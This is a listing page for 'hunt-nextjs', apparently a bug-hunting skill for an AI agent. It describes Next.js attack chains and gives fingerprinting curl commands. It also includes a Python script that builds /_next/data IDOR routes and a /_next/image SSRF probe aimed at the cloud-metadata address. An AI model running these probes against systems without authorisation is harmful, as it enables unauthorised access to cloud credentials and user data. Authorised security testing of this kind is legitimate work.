hunt-nextjs (Solid)

Hunt Next.js-specific vulnerabilities: Server Actions arbitrary function execution, Middleware auth bypass via static asset paths, ISR cache poisoning, Image Optimization SSRF (/_next/image), RSC payload leakage, getServerSideProps injection, source map exposure, debug endpoint leakage. Use when the target runs Next.js 13/14/15 or any React SSR framework.

Category: Web & Frontend | 1,912 stars | 279 forks | Updated 3 days ago | License: NOASSERTION

Quality Score: 86/100

Stars (20%): 100
Recency (20%): 100
Frontmatter (20%): 70
Documentation (15%): 100
Issue Health (10%): 50
License (10%): 100
Description (5%): 100

Skill Content

# HUNT-NEXTJS — Next.js / SSR Framework Vulnerabilities

## Crown Jewel Targets

Next.js-specific bugs that bypass auth or reach SSRF = High/Critical.

**Highest-value chains:**

- **Server Actions auth bypass** — Server Actions are public POST endpoints; when auth is enforced only in the client component that calls them, invoke the action ID directly → unauthorized data mutation or exfil
- **Middleware bypass via `/_next/static/`** — the middleware matcher skips static-asset paths; when the exclusion covers the whole `/_next` prefix, a protected page's props remain reachable as `/_next/data/` JSON → IDOR candidate
- **`/_next/image` SSRF** — the image optimizer fetches whatever the `url` parameter names, restricted only by `images.remotePatterns` / `images.domains`; a wildcard allowlist turns it into an internal network scanner or cloud-metadata reader
- **ISR stale cache poisoning** — inject malicious content into a cached page that is then served to every user until the next revalidation
- **RSC payload leakage** — React Server Component flight data carries server-side props never meant for the client

---

## Attack Surface Signals

```
/_next/image?url=&w=&q=          Image optimizer — SSRF candidate
/_next/data/BUILD_ID/*.json      Prerendered page data — IDOR candidate
/__nextjs_original-stack-frame   Debug stack frame endpoint (dev server)
/_next/static/chunks/            JS bundles — source map candidate
/api/                            API routes — standard hunt surface
__NEXT_DATA__ in HTML            SSR props leaked to client
x-nextjs-* response headers      Confirms Next.js
```

---

## Phase 1 — Fingerprint & Version Detection

```bash
# Confirm Next.js and get build ID (grep -P needs GNU grep)
curl -s https://$TARGET/ | grep -oP '"buildId":"[^"]+"'
curl -sI https://$TARGET/ | grep -i "x-powered-by\|x-nextjs"
# Extra...
```
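The Phase 1 excerpt stops at the two curl commands. The script below is an added example for this page, not code from the hunt-nextjs skill or the Claude-BugHunter repository; it runs offline on a constructed response and derives everything the phase is after: the Next.js verdict from headers and markup, the build ID and SSR'd props from `__NEXT_DATA__`, the `/_next/data` route that returns those props as JSON (the IDOR candidate from the signals table), and a `/_next/image` probe URL. It also models the `images.remotePatterns` allowlist so the wildcard config that makes the image optimizer an SSRF primitive can be compared with a strict one. `target.example`, the build ID, the sample props and both `next.config.js` pattern sets are made up for the example; the glob matcher is a simplified model of the real one, and `169.254.169.254` is the usual cloud-metadata address used as the probe target.

```python
"""Offline Next.js fingerprint and probe-URL builder (added example, not code
from the hunt-nextjs skill). One captured response yields a Next.js verdict, the
build ID and SSR'd props, the /_next/data IDOR route and a /_next/image probe."""
import json
import re
from urllib.parse import quote, urlsplit

# Constructed response, as `curl -si https://target.example/account/42` might show.
SAMPLE_HEADERS = {"X-Powered-By": "Next.js", "x-nextjs-cache": "HIT"}
SAMPLE_HTML = (
    '<html><body><div id="__next"></div>'
    '<script id="__NEXT_DATA__" type="application/json">'
    '{"props":{"pageProps":{"user":{"id":42,"email":"a@example.com",'
    '"apiToken":"sk_live_xxx"}},"__N_SSP":true},'
    '"page":"/account/[id]","query":{"id":"42"},"buildId":"Kx9abc123"}'
    '</script><script src="/_next/static/chunks/main-abc.js"></script></body></html>'
)
# images.remotePatterns from next.config.js as dicts (constructed): the wildcard
# form that turns /_next/image into an open fetcher, beside a strict allowlist.
WEAK_PATTERNS = [{"hostname": "**"}]
STRICT_PATTERNS = [{"protocol": "https", "hostname": "cdn.example.com", "pathname": "/img/**"}]
METADATA_URL = "http://169.254.169.254/latest/meta-data/"  # classic cloud-metadata SSRF target

NEXT_DATA_RE = re.compile(r'<script id="__NEXT_DATA__"[^>]*>(.*?)</script>', re.S)
SENSITIVE_KEY = re.compile(r"token|secret|key|password|credential|session", re.I)

def is_nextjs(headers, html):
    """Fingerprint: X-Powered-By, any x-nextjs-* header, or Next.js markup."""
    h = {k.lower(): v for k, v in headers.items()}
    if "next.js" in h.get("x-powered-by", "").lower() or any(k.startswith("x-nextjs-") for k in h):
        return True
    return "__NEXT_DATA__" in html or "/_next/static/" in html

def parse_next_data(html):
    """Parsed __NEXT_DATA__ blob (buildId, page, query, props), or None."""
    m = NEXT_DATA_RE.search(html)
    return json.loads(m.group(1)) if m else None

def sensitive_prop_paths(obj, prefix=""):
    """Dotted paths under the SSR props whose key names look like secrets (heuristic)."""
    found = []
    if isinstance(obj, dict):
        for k, v in obj.items():
            path = f"{prefix}.{k}" if prefix else k
            if SENSITIVE_KEY.search(k):
                found.append(path)
            found.extend(sensitive_prop_paths(v, path))
    elif isinstance(obj, list):
        for i, v in enumerate(obj):
            found.extend(sensitive_prop_paths(v, f"{prefix}[{i}]"))
    return found

def data_route(build_id, page, query):
    """/_next/data URL for a pages-router route. Dynamic segments ([id],
    [...slug]) are filled from `query`; swapping the id is the IDOR test."""
    def fill(m):
        val = query.get(m.group(2), m.group(0))
        return "/".join(val) if isinstance(val, list) else str(val)
    path = re.sub(r"\[(\.\.\.)?(\w+)\]", fill, page)
    return f"/_next/data/{build_id}{'/index' if path == '/' else path}.json"

def image_probe(target_url, width=16, quality=75):
    """/_next/image probe. `w` must be one of the configured imageSizes or
    deviceSizes (16 is in the defaults) or the optimizer answers 400 unfetched."""
    return f"/_next/image?url={quote(target_url, safe='')}&w={width}&q={quality}"

def _glob_to_re(pattern, sep):
    """Simplified model of remotePatterns globbing: `**` matches anything,
    `*` matches one hostname label or one path segment."""
    parts = re.split(r"(\*\*|\*)", pattern)
    rx = "".join(".*" if s == "**" else f"[^{re.escape(sep)}]*" if s == "*" else re.escape(s) for s in parts)
    return re.compile(f"^{rx}$")

def remote_patterns_allow(patterns, url):
    """True if the optimizer would fetch `url` under these remotePatterns
    (unset protocol/port/pathname match anything, as in Next.js)."""
    u = urlsplit(url)
    return any(
        p.get("protocol", u.scheme) == u.scheme
        and str(p.get("port", u.port or "")) == str(u.port or "")
        and _glob_to_re(p["hostname"], ".").match(u.hostname or "")
        and _glob_to_re(p.get("pathname", "/**"), "/").match(u.path or "/")
        for p in patterns
    )

def analyze(headers, html):
    """Everything Phase 1 derives from one response; None if not Next.js."""
    if not is_nextjs(headers, html):
        return None
    nd = parse_next_data(html) or {}
    return {
        "build_id": nd.get("buildId"),
        "leaked_props": sensitive_prop_paths(nd.get("props", {}).get("pageProps", {})),
        "data_route": data_route(nd["buildId"], nd["page"], nd.get("query", {})) if nd else None,
        "image_probe": image_probe(METADATA_URL),
    }

if __name__ == "__main__":
    print(json.dumps(analyze(SAMPLE_HEADERS, SAMPLE_HTML), indent=2))
    print("wildcard allows metadata:", remote_patterns_allow(WEAK_PATTERNS, METADATA_URL))
    print("strict allows metadata:", remote_patterns_allow(STRICT_PATTERNS, METADATA_URL))
```

On the constructed sample this reports `user.apiToken` as an SSR prop worth a closer look, builds `/_next/data/Kx9abc123/account/42.json` (change the `42` to test for IDOR), and shows that only the wildcard pattern set would let the `/_next/image` probe reach the metadata address; against a real target, send the generated URLs with the curl pattern from Phase 1 and compare status codes and bodies.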

Details

Author: elementalsouls
Repository: elementalsouls/Claude-BugHunter
Created: 1 month ago
Last Updated: 3 days ago
Language: Python
License: NOASSERTION

Similar Skills

Semantically similar based on skill content, not just the same category.

hunt-nodejs (AI & Automation, Solid)

Hunt Node.js-specific vulnerabilities: Prototype Pollution → RCE chains (lodash/merge/assign), Express trust proxy misconfiguration, child_process/eval injection, template engine SSTI (EJS/Pug/Handlebars), path traversal in file servers, require() injection, environment variable exfil via /proc/self/environ. Use when the target runs Node.js/Express/Fastify/NestJS/Koa.

1,912 stars, updated 3 days ago, by elementalsouls

hunt-springboot (Testing & QA, Solid)

Hunt Spring Boot-specific vulnerabilities: Actuator endpoints (heapdump, env, loggers, mappings, shutdown), Spring Expression Language (SpEL) injection → RCE, H2 console RCE, Jolokia JMX exposure, Spring4Shell (CVE-2022-22965), Spring Cloud Function SpEL (CVE-2022-22963), heap dump credential extraction. Use when the target runs Spring Boot, detected via the X-Application-Context header, /actuator, the Whitelabel Error Page, or Java stack traces.

1,912 stars, updated 3 days ago, by elementalsouls

hunt-dom (Web & Frontend, Solid)

Hunt client-side DOM vulnerabilities: DOM Clobbering (overwrite JS globals via HTML injection), PostMessage hijacking (missing origin check), Service Worker abuse (intercept requests from a same-origin script), CSS Injection/Exfiltration (attribute selectors → token char-by-char via OOB), client-side template injection, dangerouslySetInnerHTML. Grounded in named public research: Gareth Heyes / PortSwigger DOM-clobbering + DOM Invader, Michał Bentkowski DOMPurify clobbering bypasses, jQuery htmlPrefilter XSS (CVE-2020-11022 / CVE-2020-11023), d0nut CSS-exfil research. Use when hunting DOM-XSS, client-side auth bypass, or token exfiltration without server-side interaction.

1,912 stars, updated 3 days ago, by elementalsouls